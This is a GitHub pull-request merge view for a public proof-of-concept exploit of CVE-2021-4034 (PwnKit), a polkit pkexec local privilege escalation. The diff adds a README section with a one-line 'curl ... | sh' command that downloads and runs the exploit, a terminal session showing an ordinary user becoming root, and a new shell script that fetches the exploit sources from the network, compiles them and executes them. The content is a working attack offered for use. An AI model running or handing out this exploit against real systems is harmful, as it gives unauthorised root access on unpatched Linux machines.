Merge pull request #18 from berdav/pr-12-one-line-root

one line root with fixes
This commit is contained in:
Davide Berardi 2022-01-29 11:37:17 +01:00 committed by GitHub
commit e5cf2e41c3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 36 additions and 0 deletions

View File

@ -62,3 +62,23 @@ vagrant@ubuntu-impish:~/CVE-2021-4034$ echo $?
## About Polkit pkexec for Linux ## About Polkit pkexec for Linux
Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission). Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).
# One command root
You can easily exploit the system using a single script, downloadable and executable with this command:
`curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh | sh`
```bash
vagrant@ubuntu-impish:~/CVE-2021-4034$ whoami
vagrant
vagrant@ubuntu-impish:~/CVE-2021-4034$ curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh | sh
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
# whoami
root
```

16
cve-2021-4034.sh Executable file
View File

@ -0,0 +1,16 @@
#!/usr/bin/env sh
set -e
URL='https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/'
for EXPLOIT in "${URL}/cve-2021-4034.c" \
"${URL}/pwnkit.c" \
"${URL}/Makefile"
do
curl -sLO "$EXPLOIT" || wget --no-hsts -q "$EXPLOIT" -O "${EXPLOIT##*/}"
done
make
./cve-2021-4034